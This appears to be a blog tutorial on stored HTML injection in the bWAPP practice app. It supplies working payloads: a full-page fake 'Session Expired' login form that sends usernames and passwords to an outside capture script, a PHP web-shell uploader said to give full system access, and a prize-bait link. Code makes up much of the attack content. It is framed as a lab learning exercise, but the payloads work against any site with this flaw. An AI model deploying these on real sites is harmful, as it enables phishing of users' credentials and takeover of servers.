HTML Injection – Stored


Compared with other types of HTML injections, this would be quite interesting. We can easily trick others with this injection. You can create duplicate login screen, you may inject the code to trick users to click on it. Basically, this HTML stored injection will be stored in the database and retrieved later as per the need.

PHPMYADMIN

Login to bWAPP and select ‘HTML Injection – Stored‘ injection and click on ‘Hack‘ button. This is a blog where you can submit the data and could be seen by other users as well. Just for your information type some valid text in the text area field.

Blog001.png

Now let’s create a fake login form to trick users and capture their credentials
Here’s the example
Code:

<div style="position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; 
background-color:white;">
Session Expired, Please Login:<br>
<form name="login" action="http://192.168.0.3/captureData.php/">
<table>
<tr><td>Username:</td><td><input type="text" name="user"/></td></tr>
<tr><td>Password:</td><td><input type="password" name="pass"/></td></tr>
</table>
<input type="submit" value="Login"/>
</form>
</div>

Login_Fake.png

When user enter his credentials, you can capture the data.
Login_Fake1.png
Another example from google, you can upload malicious files by using fake upload button. If there’s no WAF configured then we will get access to the entire system.
Code1:

 <?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>

FIleUpload

Code2:

 Hey..!<br /><a href="http://itsecgames.com" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Click here to win IPhone99</span></a>

You can inject any HTML code. You may copy the entire page source of another website and paste it this blog field. We’ve covered all HTML injections. Hope you enjoyed.


DISCLAIMER : THE INFORMATION PUBLISHED IN THIS ARTICLE IS FOR EDUCATIONAL PURPOSE ONLY. ANY MISUSE OF THIS INFORMATION WILL NOT BE THE RESPONSIBILITY OF THE AUTHOR OF THE WEBSITE. THIS IS JUST MY LEARNING EXPERIENCE AND EDUCATIONAL BLOG FOR PEOPLE WHO WOULD LEARN FROM MY EXPERIENCE
Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s